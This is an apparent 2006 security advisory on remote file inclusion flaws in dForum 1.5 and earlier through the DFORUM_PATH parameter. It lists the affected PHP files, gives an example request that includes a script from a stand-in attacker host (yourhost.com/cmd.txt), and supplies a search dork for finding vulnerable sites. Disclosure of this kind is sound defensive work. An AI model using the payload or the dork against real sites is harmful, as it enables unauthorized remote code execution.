--Security Report-- Advisory: dForum <= 1.5 Multiple Remote File Inclusion Vulnerabilities. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 21/04/06 23:17 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@xxxxxxxxxx Web: http://www.nukedx.com } --- Vendor: dForum (http://didj.de.vu/) Version: 1.5 and prior versions must be affected. About: Via this methods remote attacker can include arbitrary files to dForum. There is lots of file inclusion on following files , they all have same vulnerability because they are module of dForum and did not set protection for them.The vulnerable parameter is DFORUM_PATH. Files -> about.php admin.php anmelden.php closethread.php config.php delpost.php delthread.php dfcode.php download.php editanoc.php forum.php login.php makethread.php menu.php newthread.php openthread.php overview.php post.php suchen.php user.php userconfig.php userinfo.php verwalten.php Level: Highly Critical --- How&Example: They all have same vulnerability just one example for them GET -> http://[victim]/[dForumPath]/verwalten.php?DFORUM_PATH=[FILE] EXAMPLE -> http://[victim]/[dForumPath]/dfcode.php?DFORUM_PATH=http://yourhost.com/cmd.txt? --- Timeline: * 21/04/2006: Vulnerability found. * 21/04/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=27 --- Dorks: "dForum v1.5" --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=27